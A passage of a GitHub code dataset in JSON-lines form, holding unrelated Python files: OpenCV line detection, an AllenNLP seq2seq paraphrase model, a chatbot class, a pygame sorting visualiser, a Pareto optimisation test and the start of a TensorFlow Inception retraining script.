(moment['m00'] + 1e-5), moment['m01'] / (moment['m00'] + 1e-5)) # calculate center of the contour\n center_contour = (int(x_contour), int(y_contour))\n cv2.circle(frame, center_contour, 5, (255,0,255),2)\n\n cv2.line(frame, center_frame, center_contour,(0,0,255),1)\n atan = math.atan2(center_frame[1]-center_contour[1], center_frame[0]-center_contour[0])\n angle = math.degrees(atan)\n angle = int(90-angle)\n cv2.putText(frame, \"{}*\".format(angle), center_frame , cv2.FONT_HERSHEY_SIMPLEX, 0.55, color, 1)\n\n cv2.imshow(\"realTimeCamera\",frame) \n cv2.imshow(\"mask_color\",mask_color)\n \n #cv2.imshow(\"Blurred\",blurred)\n key=cv2.waitKey(1)\n if key==27:\n break\ncv2.destroyAllWindows()\ncam.release()","repo_name":"solanoctua/Seeker","sub_path":"Source/LineDetection.py","file_name":"LineDetection.py","file_ext":"py","file_size_in_byte":4042,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"34498479304","text":"from typing import Dict, List, Tuple, Optional\n\nimport numpy\nfrom overrides import overrides\nimport torch\nimport torch.nn.functional as F\nfrom torch.nn.modules.linear import Linear\nfrom torch.nn.modules.rnn import LSTMCell\nfrom torch.nn import EmbeddingBag, Sequential\n\nfrom allennlp.common.checks import ConfigurationError\nfrom allennlp.common.util import START_SYMBOL, END_SYMBOL\nfrom allennlp.data.vocabulary import Vocabulary\nfrom allennlp.modules.attention import LegacyAttention\nfrom allennlp.modules import Attention, TextFieldEmbedder, Seq2SeqEncoder\nfrom allennlp.modules.similarity_functions import SimilarityFunction\nfrom allennlp.models.model import Model\nfrom allennlp.modules.token_embedders import Embedding\nfrom allennlp.modules.feedforward import FeedForward\nfrom allennlp.nn import util, RegularizerApplicator\nfrom allennlp.nn.beam_search import BeamSearch\nfrom allennlp.training.metrics import BLEU\n\n\n@Model.register(\"curiosity_paraphrase_seq2seq\")\nclass FactParaphraseSeq2Seq(Model):\n \"\"\"\n Given facts and dialog acts, it generates the paraphrased message.\n TODO: add dialog & dialog acts history\n\n This 
implementation is based off the default SimpleSeq2Seq model,\n which takes a sequence, encodes it, and then uses the encoded\n representations to decode another sequence.\n \"\"\"\n\n def __init__(\n self,\n vocab: Vocabulary,\n source_embedder: TextFieldEmbedder,\n source_encoder: Seq2SeqEncoder,\n max_decoding_steps: int,\n dialog_acts_encoder: FeedForward = None,\n attention: Attention = None,\n attention_function: SimilarityFunction = None,\n n_dialog_acts: int = None,\n beam_size: int = None,\n target_namespace: str = \"tokens\",\n target_embedding_dim: int = None,\n scheduled_sampling_ratio: float = 0.0,\n use_bleu: bool = True,\n use_dialog_acts: bool = True,\n regularizers: Optional[RegularizerApplicator] = None,\n ) -> None:\n super().__init__(vocab, regularizers)\n self._target_namespace = target_namespace\n self._scheduled_sampling_ratio = scheduled_sampling_ratio\n\n # We need the start symbol to provide as the input at the first\n # timestep of decoding, and end symbol as a way to indicate the end\n # of the decoded sequence.\n self._start_index = self.vocab.get_token_index(\n START_SYMBOL, self._target_namespace\n )\n self._end_index = self.vocab.get_token_index(END_SYMBOL, self._target_namespace)\n\n if use_bleu:\n pad_index = self.vocab.get_token_index(\n self.vocab._padding_token, self._target_namespace\n )\n self._bleu = BLEU(\n exclude_indices={pad_index, self._end_index, self._start_index}\n )\n else:\n self._bleu = None\n\n # At prediction time, we use a beam search to find the most\n # likely sequence of target tokens.\n beam_size = beam_size or 1\n self._max_decoding_steps = max_decoding_steps\n self._beam_search = BeamSearch(\n self._end_index, max_steps=max_decoding_steps, beam_size=beam_size\n )\n\n # Dense embedding of source (Facts) vocab tokens.\n self._source_embedder = source_embedder\n\n # Encodes the sequence of source embeddings into a sequence of hidden states.\n self._source_encoder = source_encoder\n\n if use_dialog_acts:\n # Dense embedding of dialog acts.\n da_embedding_dim = dialog_acts_encoder.get_input_dim()\n self._dialog_acts_embedder = EmbeddingBag(n_dialog_acts, da_embedding_dim)\n\n # Encodes dialog acts\n self._dialog_acts_encoder = dialog_acts_encoder\n\n else:\n self._dialog_acts_embedder = None\n self._dialog_acts_encoder = None\n\n num_classes = self.vocab.get_vocab_size(self._target_namespace)\n\n # Attention mechanism applied to the encoder output for each step.\n if attention:\n if attention_function:\n raise ConfigurationError(\n \"You can only specify an attention module or an \"\n \"attention function, but not both.\"\n )\n self._attention = attention\n elif attention_function:\n self._attention = LegacyAttention(attention_function)\n else:\n self._attention = None\n\n # Dense embedding of vocab words in the target space.\n target_embedding_dim = target_embedding_dim or source_embedder.get_output_dim()\n self._target_embedder = Embedding(num_classes, target_embedding_dim)\n\n # Decoder output dim needs to be the same as the encoder output dim\n # since we initialize the hidden state of the decoder with the final\n # hidden state of the encoder.\n self._encoder_output_dim = self._source_encoder.get_output_dim()\n if use_dialog_acts:\n self._merge_encoder = Sequential(\n Linear(\n self._source_encoder.get_output_dim()\n + self._dialog_acts_encoder.get_output_dim(),\n self._encoder_output_dim,\n )\n )\n self._decoder_output_dim = self._encoder_output_dim\n\n if self._attention:\n # If using attention, a weighted average over encoder 
outputs will\n # be concatenated to the previous target embedding to form the input\n # to the decoder at each time step.\n self._decoder_input_dim = self._decoder_output_dim + target_embedding_dim\n else:\n # Otherwise, the input to the decoder is just the previous target embedding.\n self._decoder_input_dim = target_embedding_dim\n\n # We'll use an LSTM cell as the recurrent cell that produces a hidden state\n # for the decoder at each time step.\n # TODO (pradeep): Do not hardcode decoder cell type.\n self._decoder_cell = LSTMCell(self._decoder_input_dim, self._decoder_output_dim)\n\n # We project the hidden state from the decoder into the output vocabulary space\n # in order to get log probabilities of each target token, at each time step.\n self._output_projection_layer = Linear(self._decoder_output_dim, num_classes)\n\n def take_step(\n self, last_predictions: torch.Tensor, state: Dict[str, torch.Tensor]\n ) -> Tuple[torch.Tensor, Dict[str, torch.Tensor]]:\n \"\"\"\n Take a decoding step. This is called by the beam search class.\n \"\"\"\n # shape: (group_size, num_classes)\n output_projections, state = self._prepare_output_projections(\n last_predictions, state\n )\n\n # shape: (group_size, num_classes)\n class_log_probabilities = F.log_softmax(output_projections, dim=-1)\n\n return class_log_probabilities, state\n\n @overrides\n def forward(\n self, # type: ignore\n source_tokens: Dict[str, torch.LongTensor],\n target_tokens: Dict[str, torch.LongTensor] = None,\n dialog_acts: Optional[torch.Tensor] = None,\n sender: Optional[torch.Tensor] = None,\n metadata: Optional[Dict] = None,\n ) -> Dict[str, torch.Tensor]:\n \"\"\"\n Make foward pass with decoder logic for producing the entire target sequence.\n \"\"\"\n source_state, dialog_acts_state = self._encode(source_tokens, dialog_acts)\n\n if target_tokens:\n state = self._init_decoder_state(source_state, dialog_acts_state)\n # The `_forward_loop` decodes the input sequence and\n # computes the loss during training and validation.\n output_dict = self._forward_loop(state, target_tokens)\n else:\n output_dict = {}\n\n if not self.training:\n state = self._init_decoder_state(source_state, dialog_acts_state)\n predictions = self._forward_beam_search(state)\n output_dict.update(predictions)\n if target_tokens and self._bleu:\n # shape: (batch_size, beam_size, max_sequence_length)\n top_k_predictions = output_dict[\"predictions\"]\n # shape: (batch_size, max_predicted_sequence_length)\n best_predictions = top_k_predictions[:, 0, :]\n self._bleu(best_predictions, target_tokens[\"tokens\"])\n\n return output_dict\n\n @overrides\n def decode(self, output_dict: Dict[str, torch.Tensor]) -> Dict[str, torch.Tensor]:\n \"\"\"\n Finalize predictions.\n \"\"\"\n predicted_indices = output_dict[\"predictions\"]\n if not isinstance(predicted_indices, numpy.ndarray):\n predicted_indices = predicted_indices.detach().cpu().numpy()\n all_predicted_tokens = []\n for indices in predicted_indices:\n # Beam search gives us the top k results for each source sentence\n # in the batch but we just want the single best.\n if len(indices.shape) > 1:\n indices = indices[0]\n indices = list(indices)\n # Collect indices till the first end_symbol\n if self._end_index in indices:\n indices = indices[: indices.index(self._end_index)]\n predicted_tokens = [\n self.vocab.get_token_from_index(x, namespace=self._target_namespace)\n for x in indices\n ]\n all_predicted_tokens.append(predicted_tokens)\n output_dict[\"predicted_tokens\"] = all_predicted_tokens\n return 
output_dict\n\n def _encode(\n self, source_tokens: Dict[str, torch.Tensor], dialog_acts: torch.Tensor = None\n ) -> Tuple[Dict[str, torch.Tensor], torch.Tensor]:\n # Encode source tokens\n source_state = self._encode_source_tokens(source_tokens)\n\n # Encode dialog acts\n if self._dialog_acts_encoder:\n dialog_acts_state = self._encode_dialog_acts(dialog_acts)\n\n else:\n dialog_acts_state = None\n\n return (source_state, dialog_acts_state)\n\n def _encode_source_tokens(\n self, source_tokens: Dict[str, torch.Tensor]\n ) -> Dict[str, torch.Tensor]:\n # shape: (batch_size, max_input_sequence_length, encoder_input_dim)\n embedded_input = self._source_embedder(source_tokens)\n # shape: (batch_size, max_input_sequence_length)\n source_mask = util.get_text_field_mask(source_tokens)\n # shape: (batch_size, max_input_sequence_length, encoder_output_dim)\n encoder_outputs = self._source_encoder(embedded_input, source_mask)\n return {\"source_mask\": source_mask, \"encoder_outputs\": encoder_outputs}\n\n def _encode_dialog_acts(self, dialog_acts: torch.Tensor) -> torch.Tensor:\n # shape: (batch_size, dialog_acts_embeddings_size)\n embedded_dialog_acts = self._dialog_acts_embedder(dialog_acts)\n\n # shape: (batch_size, dim_encoder)\n dialog_acts_state = self._dialog_acts_encoder(embedded_dialog_acts)\n return dialog_acts_state\n\n def _init_decoder_state(\n self,\n source_state: Dict[str, torch.Tensor],\n dialog_acts_state: torch.Tensor = None,\n ) -> Dict[str, torch.Tensor]:\n batch_size = source_state[\"source_mask\"].size(0)\n\n # shape: (batch_size, encoder_output_dim)\n final_encoder_output = util.get_final_encoder_states(\n source_state[\"encoder_outputs\"],\n source_state[\"source_mask\"],\n self._source_encoder.is_bidirectional(),\n )\n\n # Condition the source tokens state with dialog acts state\n if self._dialog_acts_encoder:\n final_encoder_output = self._merge_encoder(\n torch.cat([final_encoder_output, dialog_acts_state], dim=1)\n )\n\n # Initialize the decoder hidden state with the final output of the encoder.\n # shape: (batch_size, decoder_output_dim)\n source_state[\"decoder_hidden\"] = final_encoder_output\n # shape: (batch_size, decoder_output_dim)\n source_state[\"decoder_context\"] = source_state[\"encoder_outputs\"].new_zeros(\n batch_size, self._decoder_output_dim\n )\n return source_state\n\n def _forward_loop(\n self,\n state: Dict[str, torch.Tensor],\n target_tokens: Dict[str, torch.LongTensor] = None,\n ) -> Dict[str, torch.Tensor]:\n \"\"\"\n Make forward pass during training or do greedy search during prediction.\n Notes\n -----\n We really only use the predictions from the method to test that beam search\n with a beam size of 1 gives the same results.\n \"\"\"\n # shape: (batch_size, max_input_sequence_length)\n source_mask = state[\"source_mask\"]\n\n batch_size = source_mask.size()[0]\n\n if target_tokens:\n # shape: (batch_size, max_target_sequence_length)\n targets = target_tokens[\"tokens\"]\n\n _, target_sequence_length = targets.size()\n\n # The last input from the target is either padding or the end symbol.\n # Either way, we don't have to process it.\n num_decoding_steps = target_sequence_length - 1\n else:\n num_decoding_steps = self._max_decoding_steps\n\n # Initialize target predictions with the start index.\n # shape: (batch_size,)\n last_predictions = source_mask.new_full(\n (batch_size,), fill_value=self._start_index\n )\n\n step_logits: List[torch.Tensor] = []\n step_predictions: List[torch.Tensor] = []\n for timestep in range(num_decoding_steps):\n if 
self.training and torch.rand(1).item() < self._scheduled_sampling_ratio:\n # Use gold tokens at test time and at a rate of\n # 1 - _scheduled_sampling_ratio during training.\n # shape: (batch_size,)\n input_choices = last_predictions\n elif not target_tokens:\n # shape: (batch_size,)\n input_choices = last_predictions\n else:\n # shape: (batch_size,)\n input_choices = targets[:, timestep]\n\n # shape: (batch_size, num_classes)\n output_projections, state = self._prepare_output_projections(\n input_choices, state\n )\n\n # list of tensors, shape: (batch_size, 1, num_classes)\n step_logits.append(output_projections.unsqueeze(1))\n\n # shape: (batch_size, num_classes)\n class_probabilities = F.softmax(output_projections, dim=-1)\n\n # shape (predicted_classes): (batch_size,)\n _, predicted_classes = torch.max(class_probabilities, 1)\n\n # shape (predicted_classes): (batch_size,)\n last_predictions = predicted_classes\n\n step_predictions.append(last_predictions.unsqueeze(1))\n\n # shape: (batch_size, num_decoding_steps)\n predictions = torch.cat(step_predictions, 1)\n\n output_dict = {\"predictions\": predictions}\n\n if target_tokens:\n # shape: (batch_size, num_decoding_steps, num_classes)\n logits = torch.cat(step_logits, 1)\n\n # Compute loss.\n target_mask = util.get_text_field_mask(target_tokens)\n loss = self._get_loss(logits, targets, target_mask)\n output_dict[\"loss\"] = loss\n\n return output_dict\n\n def _forward_beam_search(\n self, state: Dict[str, torch.Tensor]\n ) -> Dict[str, torch.Tensor]:\n \"\"\"Make forward pass during prediction using a beam search.\"\"\"\n batch_size = state[\"source_mask\"].size()[0]\n start_predictions = state[\"source_mask\"].new_full(\n (batch_size,), fill_value=self._start_index\n )\n\n # shape (all_top_k_predictions): (batch_size, beam_size, num_decoding_steps)\n # shape (log_probabilities): (batch_size, beam_size)\n all_top_k_predictions, log_probabilities = self._beam_search.search(\n start_predictions, state, self.take_step\n )\n\n output_dict = {\n \"class_log_probabilities\": log_probabilities,\n \"predictions\": all_top_k_predictions,\n }\n return output_dict\n\n def _prepare_output_projections(\n self, last_predictions: torch.Tensor, state: Dict[str, torch.Tensor]\n ) -> Tuple[torch.Tensor, Dict[str, torch.Tensor]]:\n \"\"\"\n Decode current state and last prediction to produce produce projections\n into the target space, which can then be used to get probabilities of\n each target token for the next step.\n Inputs are the same as for `take_step()`.\n \"\"\"\n # shape: (group_size, max_input_sequence_length, encoder_output_dim)\n encoder_outputs = state[\"encoder_outputs\"]\n\n # shape: (group_size, max_input_sequence_length)\n source_mask = state[\"source_mask\"]\n\n # shape: (group_size, decoder_output_dim)\n decoder_hidden = state[\"decoder_hidden\"]\n\n # shape: (group_size, decoder_output_dim)\n decoder_context = state[\"decoder_context\"]\n\n # shape: (group_size, target_embedding_dim)\n embedded_input = self._target_embedder(last_predictions)\n\n if self._attention:\n # shape: (group_size, encoder_output_dim)\n attended_input = self._prepare_attended_input(\n decoder_hidden, encoder_outputs, source_mask\n )\n\n # shape: (group_size, decoder_output_dim + target_embedding_dim)\n decoder_input = torch.cat((attended_input, embedded_input), -1)\n else:\n # shape: (group_size, target_embedding_dim)\n decoder_input = embedded_input\n\n # shape (decoder_hidden): (batch_size, decoder_output_dim)\n # shape (decoder_context): (batch_size, 
decoder_output_dim)\n decoder_hidden, decoder_context = self._decoder_cell(\n decoder_input, (decoder_hidden, decoder_context)\n )\n\n state[\"decoder_hidden\"] = decoder_hidden\n state[\"decoder_context\"] = decoder_context\n\n # shape: (group_size, num_classes)\n output_projections = self._output_projection_layer(decoder_hidden)\n\n return output_projections, state\n\n def _prepare_attended_input(\n self,\n decoder_hidden_state: torch.LongTensor = None,\n encoder_outputs: torch.LongTensor = None,\n encoder_outputs_mask: torch.LongTensor = None,\n ) -> torch.Tensor:\n \"\"\"Apply attention over encoder outputs and decoder state.\"\"\"\n # Ensure mask is also a FloatTensor. Or else the multiplication within\n # attention will complain.\n # shape: (batch_size, max_input_sequence_length)\n encoder_outputs_mask = encoder_outputs_mask.float()\n\n # shape: (batch_size, max_input_sequence_length)\n input_weights = self._attention(\n decoder_hidden_state, encoder_outputs, encoder_outputs_mask\n )\n\n # shape: (batch_size, encoder_output_dim)\n attended_input = util.weighted_sum(encoder_outputs, input_weights)\n\n return attended_input\n\n @staticmethod\n def _get_loss(\n logits: torch.LongTensor,\n targets: torch.LongTensor,\n target_mask: torch.LongTensor,\n ) -> torch.Tensor:\n\n # shape: (batch_size, num_decoding_steps)\n relevant_targets = targets[:, 1:].contiguous()\n\n # shape: (batch_size, num_decoding_steps)\n relevant_mask = target_mask[:, 1:].contiguous()\n\n return util.sequence_cross_entropy_with_logits(\n logits, relevant_targets, relevant_mask\n )\n\n @overrides\n def get_metrics(self, reset: bool = False) -> Dict[str, float]:\n all_metrics: Dict[str, float] = {}\n if self._bleu and not self.training:\n all_metrics.update(self._bleu.get_metric(reset=reset))\n return all_metrics\n","repo_name":"facebookresearch/curiosity","sub_path":"curiosity/paraphrase_models.py","file_name":"paraphrase_models.py","file_ext":"py","file_size_in_byte":19824,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"54"} +{"seq_id":"7878341520","text":"\"\"\" Advent of code 2017\tday 2/1\t\"\"\"\n\nfrom argparse import ArgumentParser\nfrom functools import reduce\n\ndef row(line):\n \"\"\" Count the checksum of a row \"\"\"\n elemlist = map(int, line.strip().split(\"\\t\"))\n return max(elemlist) - min(elemlist)\n\ndef solution(input_data):\n \"\"\" Solution to the problem \"\"\"\n return sum([row(line) for line in input_data.split(\"\\n\")])\n\nif __name__ == \"__main__\":\n PARSER = ArgumentParser()\n PARSER.add_argument(\"--input\", dest='input', action='store_true')\n PARSER.add_argument(\"--test\")\n ARGS = PARSER.parse_args()\n if ARGS.input:\n with(open('input.txt', 'rb')) as input_file:\n print(solution(input_file.read()))\n elif ARGS.test:\n print(solution(str(ARGS.test)))\n else:\n DEBUG = \"\"\"5\t1\t9\t5\n 7\t5\t3\n 2\t4\t6\t8\"\"\"\n print(solution(DEBUG))\n","repo_name":"budavariam/advent_of_code","sub_path":"2017/02_1/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"33335172724","text":"import os \r\nimport sys\r\n\r\n# add local narwhal to the module path\r\nthis_file = os.path.abspath(__file__)\r\nnarwhal_dir = os.path.join(os.path.dirname(this_file), '..')\r\nnarwhal_dir = os.path.normpath(narwhal_dir)\r\nsys.path.insert(0, narwhal_dir)\r\n\r\nfrom narwhal.nwtypes import *\r\nfrom narwhal.nwchat import *\r\nfrom 
stdtrees.ask import *\r\n\r\nfrom faqabout import *\r\nfrom faqanswer import *\r\n\r\nclass FAQAppChat(TChat):\r\n def __init__(self, basedata, subchats = None):\r\n\r\n self.basedata = basedata\r\n self.about = FAQAboutChat( basedata.info, basedata.phone, basedata.contact )\r\n self.answer = FAQAnswerChat( FAQAnswer(basedata.id, basedata.vocabLists) )\r\n \r\n\r\n \r\n def Read(self, text):\r\n about = self.about #for readability\r\n answer = self.answer \r\n answer.topic.clearReaders()\r\n\r\n about.caveat = ''\r\n answer.caveat = ''\r\n\r\n if about.questionPending:\r\n answer.Read(text)\r\n if answer.gof>0.5:\r\n self.caveat = answer.Write()\r\n else:\r\n about.Read(text) \r\n if about.gof>0.5:\r\n self.caveat = about.Write()\r\n else:\r\n self.caveat = \"I am sorry, I don't know about that\"\r\n about.questionPending = False\r\n else:\r\n about.Read(text)\r\n if about.questionPending: #handle question this time?\r\n answer.Read(text)\r\n if answer.gof>0.5:\r\n about.caveat = ''\r\n self.caveat = answer.Write()\r\n elif about.gof>0.5:\r\n answer.caveat = ''\r\n self.caveat = about.Write()\r\n else:\r\n self.caveat = \"I am sorry, I don't know about that\"\r\n else:\r\n self.caveat = about.Write()\r\n \r\n\r\n self.update()\r\n\r\n \r\n def Write(self):\r\n s = self.caveat\r\n return s\r\n\r\n \r\n#---------------------------------\r\nFAQGREET = 0\r\nFAQASK = 1\r\nFAQASKDETAIL = 2\r\n\r\nfaqResponse = {\r\n FAQGREET : \"ok\",\r\n FAQASK: \"I {}\",\r\n FAQASKDETAIL : \"please clarify {}\"\r\n }\r\n\r\nfaqResponseV = {\r\n FAQGREET : [],\r\n FAQASK: [],\r\n FAQASKDETAIL :[],\r\n }\r\n\r\nfaqResponder = NWTopicResponder(bResponse, bResponseV)\r\n\r\n\r\nclass FAQChat(NWDataChat):\r\n def __init__(self, topic):\r\n NWDataChat.__init__(self, topic, faqResponder)\r\n\r\n def Read(self, text):\r\n NWDataChat.Read(self,text)\r\n\r\n def update(self):\r\n x = 2","repo_name":"peterwaksman/Narwhal","sub_path":"exampleOldChatbots/faq/faqchat.py","file_name":"faqchat.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"54"} +{"seq_id":"13489423347","text":"import os\nimport re\nimport sys\nfrom src.speaker import speak\nfrom threading import Thread\n\ndata_dir = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))), 'data')\nprint(\"Data dir: \" + data_dir)\n\n\ndef cache(fun):\n cache.response_ = {}\n\n def inner():\n if fun.__name__ not in cache.response_:\n cache.response_[fun.__name__] = fun()\n return cache.response_[fun.__name__]\n\n return inner\n\n\n@cache\ndef show_gui():\n return \"nogui\" not in map(lambda arg: arg.lower(), sys.argv)\n\n\n@cache\ndef use_epaper():\n return \"use-epaper\" in map(lambda arg: arg.lower(), sys.argv)\n\n\n@cache\ndef disable_speaker():\n return \"disable-speaker\" in map(lambda arg: arg.lower(), sys.argv)\n\n\ndef get_argument_value(argument_name: str):\n for arg in sys.argv:\n match = re.match(rf\"{argument_name}=(.*)\", arg)\n if match and len(match.groups()) > 0:\n return match.groups()[0]\n return None\n\n\ndef loud_print(text: str, speak_asynchronously: bool = False):\n print(text)\n if disable_speaker():\n return\n if speak_asynchronously:\n speaking_thread = Thread(target=lambda _text: speak(_text), args=(text,), daemon=True)\n speaking_thread.start()\n else:\n 
speak(text)\n","repo_name":"Aktyn/Protaktyn","sub_path":"src/common/common_utils.py","file_name":"common_utils.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4622500023","text":"# Python implementation for visualizing merge sort. \r\nimport pygame \r\nimport random \r\npygame.font.init() \r\n# Total window \r\nscreen = pygame.display.set_mode((900, 650)) \r\npygame.display.set_caption(\"SORTING VISUALISER\")\r\n\r\n# Generate new Array \r\ndef generate_arr(arr_clr,clr):\r\n #intializing the array with size of array as 20\r\n array =[0]*20\r\n for i in range(1, 20):\r\n #filling color of each of box that represents each element of the array\r\n arr_clr[i]= clr[2]\r\n #filing the value in each index of the array\r\n array[i]= random.randrange(1, 100)\r\n return array\r\n\r\n\r\ndef refill(arr_clr,clr,array): \r\n\tscreen.fill((255, 255, 255)) \r\n\tdraw(arr_clr,clr,array) \r\n\tpygame.display.update() \r\n\tpygame.time.delay(20) \r\n\r\n# Sorting Algo:Merge sort \r\ndef quicksort(array, l, r,arr_clr,clr): \r\n if l[][] -> (b[c[1]][0]\n\n df_co.loc[i] = [f\"G{generation}_C{i}_CO\",\n df.loc[np.random.randint(5)][\"x\"], # A\n df.loc[np.random.randint(5)][\"y\"]] # B]\n return df_co\n\n\ndef mutation(df, n):\n df_ng_mut = pd.DataFrame(columns=['key', 'x', 'y'])\n df_ng_mut.loc[:, 'A'] = df.loc[:, \"A\"] * random.uniform(0.85, 1.5)\n df_ng_mut.loc[:, 'B'] = df.loc[:, \"B\"] * random.uniform(0.85, 1.5)\n\n key1, key2 = [], []\n for i in range(len(df_ng_mut)):\n key1.append(f\"G{n}_C{i}_M\")\n\n df_ng_mut.loc[:, 'key'] = key1\n\n return df_ng_mut\n\n\ndef chaos(f, n):\n data = {'key': [f\"G{n}_C{i}_CH\" for i in range(f)],\n 'x': random.sample(list(np.linspace(0.5, 1.5, f * 10)), f),\n 'y': random.sample(list(np.linspace(0.5, 1.5, f * 10)), f)}\n\n df = pd.DataFrame.from_dict(data)\n return df\n\n\ndef ea(self, df, obj, constraints, n):\n # optimize by page rank\n # remove the lowest ranking members\n\n # compare with global dict and remove duplicates\n compared_cols = ['x', 'y']\n if not self.df_global.empty:\n df = df.loc[~df.set_index(compared_cols).index.isin(df_global.set_index(compared_cols).index)] # this line of code removes duplicates\n\n # replace Req with tuned Req\n df[['f1', 'f2']] = [(x-1)**2 + 3*(y-1)**2, 4*x**2 + y**2 + x*y]\n\n ######################################################\n # filter by constraints\n for const in self.constraints:\n c = const.split(\" \")\n\n if c[1] == '>':\n df = df.loc[(df[f'{c[0]}'] > float(c[2]))]\n elif c[1] == '<':\n df = df.loc[(df[f'{c[0]}'] < float(c[2]))]\n elif c[1] == '<=':\n df = df.loc[(df[f'{c[0]}'] <= float(c[2]))]\n elif c[1] == '>=':\n df = df.loc[(df[f'{c[0]}'] >= float(c[2]))]\n elif c[1] == '==':\n df = df.loc[(df[f'{c[0]}'] == float(c[2]))]\n\n # update with global dataframe\n if not self.df_global.empty:\n df = pd.concat([self.df_global, df], ignore_index=True)\n\n # reset total rank\n df['total_rank'] = 0\n\n # rank shapes by objectives\n for i, obj in enumerate(self.objectives):\n\n if obj[0] == \"min\":\n df[f'rank_{obj[1]}'] = df[obj[1]].rank() * self.weights[i]\n elif obj[0] == \"max\":\n df[f'rank_{obj[1]}'] = df[obj[1]].rank(ascending=False) * self.weights[i]\n elif obj[0] == \"equal\": # define properly later\n continue\n\n # if 'total_rank' in df.columns:\n df[f'total_rank'] = df[f'total_rank'] + df[f'rank_{obj[1]}']\n\n # reorder\n ic(df)\n tot = df.pop(f'total_rank')\n ic(tot)\n df[f'total_rank'] = tot / 
sum(self.weights) # normalize by sum of weights\n ic(df)\n\n # order shapes by rank\n df = df.sort_values(by=['total_rank'])\n df = df.reset_index(drop=True)\n\n # pareto condition\n reorder_indx = self.pareto_front(df)\n df = df.loc[reorder_indx, :]\n df = df.reset_index(drop=True)\n ic(df)\n\n # update global\n if len(df) > self.tuneUI.sb_Max_Table_Size.value():\n # self.df_global = df.loc[0:self.tuneUI.cb_Max_Table_Size.value(), :]\n df_global = df\n else:\n df_global = df\n ic(df_global)\n\n # save dataframe\n filename = fr\"{self.projectDir}\\SimulationData\\SLANS\\Generation{n}.xlsx\"\n recursive_save(self.df_global, filename, reorder_indx)\n\n # crossover\n print(\"Crossover\")\n df_cross = crossover(df, n, self.tuneUI.sb_Crossover_Factor.value()) # , elites[\"GR/Q\n # ic(df_cross)\n\n # mutation\n print(\"Mutation\")\n df_mutation = mutation(df, n)\n # ic(df_mutation)\n\n # chaos\n print(\"Chaos\")\n df_chaos = chaos(self.tuneUI.sb_Chaos_Factor.value(), n)\n # ic(df_chaos)\n\n # take elites from previous generation over to next generation\n df_ng = pd.concat([df_cross, df_mutation, df_chaos], ignore_index=True)\n\n # update dictionary\n df = df_ng\n\n n += 1\n print(n)\n print(\"=\" * 80)\n if n < self.ng_max:\n return self.ea(n)\n else:\n return\n\n\nif __name__ == '__main__':\n\n f1_arr, f2_arr = [], []\n for x in np.linspace(-0.5, 1.5, 1000):\n for y in np.linspace(-0.5, 1.5, 100):\n f1 = (x-1)**2 + 3*(y-1)**2\n f2 = 4*x**2 + y**2 + x*y\n\n f1_arr.append(f1)\n f2_arr.append(f2)\n\n f1_p, f2_p = pareto_front(f1_arr, f2_arr)\n\n import matplotlib.pyplot as plt\n plt.scatter(f1_p, f2_p, s=5)\n plt.show()\n","repo_name":"Dark-Elektron/CavityDesignHub","sub_path":"utils/pareto_test_problem.py","file_name":"pareto_test_problem.py","file_ext":"py","file_size_in_byte":5493,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"35577239303","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport hashlib\nimport os.path\nimport random\nimport re\nimport sys\nimport tarfile\nimport logging\n\nimport numpy as np\nimport urllib\nimport tensorflow as tf\n\nfrom tensorflow.python.framework import graph_util\nfrom tensorflow.python.framework import tensor_shape\nfrom tensorflow.python.platform import gfile\nfrom tensorflow.python.util import compat\nfrom tensorflow.python.client import device_lib\n\n# END OF IMPORTS\n\nlogging.basicConfig(format='%(asctime)s || %(message)s')\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\nSUPPORTED_EXTENSIONS = ['jpg', 'jpeg', 'JPG', 'JPEG']\nscript_dir = os.path.dirname(__file__)\n\noutputFilePath = \"simple_output.csv\"\n\n# GLOBAL FLAGS FOR TF\nFLAGS = None\n\nINCEPTION_V3_DOWNLOAD_URL = 'http://download.tensorflow.org/models/image/imagenet/inception-2015-12-05.tgz'\n\n# Parameters used by Inception V3\nBOTTLENECK_TENSOR_NAME = 'pool_3/_reshape:0'\nBOTTLENECK_TENSOR_SIZE = 2048\nMODEL_INPUT_WIDTH = 299\nMODEL_INPUT_HEIGHT = 299\nMODEL_INPUT_DEPTH = 3\nJPEG_DATA_TENSOR_NAME = 'DecodeJpeg/contents:0'\nRESIZED_INPUT_TENSOR_NAME = 'ResizeBilinear:0'\nMAX_NUM_IMAGES_PER_CLASS = 2 ** 27 - 1 # ~134M\nMIN_NUM_IMAGES_PER_CLASS = 20\n\n\ndef detect_devices():\n logger.info(\"Detecting devices\")\n local_device_protos = device_lib.list_local_devices()\n gpus = [x.name for x in local_device_protos if x.device_type == 'GPU']\n cpus = [x.name for x in local_device_protos if x.device_type == 'CPU']\n if gpus:\n 
for g in gpus:\n logger.info(\"GPU {} detected\".format(g).upper())\n else:\n logger.info(\"NO GPU DETECTED, USING CPU\")\n for c in cpus:\n logger.info(\"CPU {} detected\".format(c))\n\n# Downloads the inception v3 model.\ndef download_inception_v3():\n logger.info(\"Attempting to download inception v3 model\")\n dest_directory = FLAGS.model_dir\n if not os.path.exists(dest_directory):\n os.makedirs(dest_directory)\n filename = INCEPTION_V3_DOWNLOAD_URL.split('/')[-1]\n filepath = os.path.join(dest_directory, filename)\n if not os.path.exists(filepath):\n # CLOSURE\n def _progress(count, block_size, total_size):\n sys.stdout.write('\\r>> Downloading %s %.1f%%' %\n (filename,\n float(count * block_size) / float(total_size) * 100.0))\n sys.stdout.flush()\n\n filepath, _ = urllib.request.urlretrieve(INCEPTION_V3_DOWNLOAD_URL,\n filepath,\n _progress)\n print()\n statinfo = os.stat(filepath)\n logger.info('Successfully downloaded', filepath, statinfo.st_size, 'bytes.')\n else:\n logger.info(\"Inception v3 model already present\")\n tarfile.open(filepath, 